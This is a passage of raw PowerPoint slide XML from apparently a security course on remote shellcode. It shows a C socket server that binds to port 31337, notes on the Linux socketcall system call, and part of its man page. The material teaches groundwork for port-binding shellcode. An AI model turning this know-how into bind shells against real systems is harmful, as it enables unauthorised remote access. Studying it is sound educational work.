                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>client_addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;   // My address information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>socklen_t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sin_size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> yes=1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sockfd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = socket(PF_INET, SOCK_STREAM, 0);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>host_addr.sin_family</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = AF_INET;         // Host byte order</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>host_addr.sin_port</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>htons</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(31337);      // Short, network byte order</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>host_addr.sin_addr.s_addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = INADDR_ANY; // Automatically fill with my IP.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>memset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(&amp;(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>host_addr.sin_zero</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>), '\0', 8); // Zero the rest of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>struct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   bind(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sockfd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>struct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sockaddr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> *)&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>host_addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sizeof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>struct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sockaddr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   listen(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sockfd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, 4);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sin_size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sizeof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>struct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sockaddr_in</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>new_sockfd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = accept(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sockfd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>struct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sockaddr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> *)&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>client_addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sin_size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="70500477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7270700"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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Socket functions can be accessed via the system call “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>socketcall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="223838" indent="-223838" algn="l" defTabSz="895350">
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
            </a:pP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smtClean="0"/>
              <a:t>Remote </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="467544" y="1981527"/>
            <a:ext cx="8424936" cy="3598421"/>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200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>reader@hacking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:~/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>booksrc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> $ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>socketcall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/include/asm-i386/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>unistd.h</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#define __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>NR_socketcall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>         102</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>reader@hacking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:~/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>booksrc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> $ man 2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>socketcall</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>IPC(2)                     Linux Programmer's Manual                     IPC(2)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>NAME</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>socketcall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> - socket system calls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SYNOPSIS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>socketcall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> call, unsigned long *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>args</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>DESCRIPTION</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
